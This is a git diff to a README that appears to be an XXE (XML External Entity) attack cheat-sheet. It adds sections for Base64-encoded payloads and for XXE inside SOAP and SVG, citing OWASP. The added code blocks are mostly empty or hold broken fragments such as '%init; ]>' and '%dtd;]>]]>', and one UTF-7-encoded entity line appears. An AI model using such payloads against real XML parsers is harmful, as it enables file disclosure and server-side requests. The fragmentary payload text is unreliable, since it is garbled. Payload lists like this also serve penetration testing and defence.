diff --git a/README.md b/README.md index bcde9e3..43cd908 100644 --- a/README.md +++ b/README.md @@ -127,6 +127,30 @@ There are various types of XXE attacks: +ADw-foo+AD4AJg-xxe+ADsAPA-/foo+AD4 ``` +###### XXE: Base64 Encoded + +``` + %init; ]> +``` + +###### XXE: XXE inside SOAP Example + +``` + + + %dtd;]>]]> + + +``` + +###### XXE: XXE inside SVG + +``` + + + +``` + #### References : 👉 [XML External Entity (XXE) Processing](https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing)